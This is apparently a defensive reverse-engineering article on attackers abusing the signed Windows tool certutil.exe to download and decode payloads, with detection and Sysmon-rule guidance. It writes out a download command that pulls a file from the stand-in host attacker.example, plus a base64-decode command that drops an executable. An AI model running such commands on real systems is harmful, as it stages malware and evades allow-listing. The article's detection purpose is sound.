Skip to content
Reverse Engineering
Living off the Landbeginner

Certutil Download & Decode

Attackers abuse the signed certutil.exe to download remote payloads and to base64/hex decode staged files, proxying ingress under a trusted binary.

certutil.exe is a signed Windows command-line program for managing certificates and Certificate Services. Two of its features are routinely abused: it can download an arbitrary file from a URL (-urlcache/-verifyctl), and it can decode base64- or hex-encoded data (-decode/-decodehex). Together these turn a trusted binary into a downloader and a decoder for staged payloads.

Attackers favour certutil because it is Microsoft-signed, present on every Windows host, and often overlooked by allow-listing. Analysts encounter it during the ingress and de-staging steps of an intrusion: a script or command interpreter calls certutil to pull a payload over HTTP/S, then decodes a text-encoded blob into an executable to defeat content inspection.

How it works

The download abuse uses the URL cache feature, typically with flags to keep it quiet:

text
certutil.exe -urlcache -split -f http://attacker.example/p.txt c:\users\public\p.exe

-urlcache -f forces a fresh fetch, -split writes the body to the named output file. Attackers often stage the payload as base64 text (to survive web filters) and then de-stage it locally:

text
certutil.exe -decode c:\users\public\p.b64 c:\users\public\p.exe

The recognisable indicators are the -urlcache/-verifyctl flags paired with an http/https URL, and -decode/-decodehex writing an .exe/.dll output — none of which relate to certificate management, the binary's stated purpose.

Detection & analysis

Static analysis:

  • A base64-staged payload is a text file beginning with -----BEGIN CERTIFICATE----- (certutil's expected wrapper) or raw base64. Decode it and triage the resulting PE for malicious indicators.
  • Regex/YARA the command line: certutil combined with -urlcache, -verifyctl, -split, -decode, -decodehex, or -f plus a URL is high-signal. Legitimate certificate operations rarely use these in combination.

Dynamic analysis:

  • In a sandbox, watch for certutil.exe opening an outbound HTTP/S connection and writing a file into a user-writable directory — a clear downloader pattern. Capture the URL and dropped file.
  • Inspect the process tree: certutil spawned by powershell.exe, cmd.exe, wscript.exe, or an Office app is anomalous, as is a certutil run immediately followed by execution of the file it just wrote or decoded.

Detection rule hint:

Alert on Sysmon Event ID 1 where Image ends with \certutil.exe AND the command line contains -urlcache/-verifyctl/-decode/-decodehex (especially with -f and an http/https URL or an .exe/.dll output). Correlate with Event ID 3 (network connection) and Event ID 11 (file create) from the same PID to confirm download-and-stage behaviour.

Votes

Comments(0)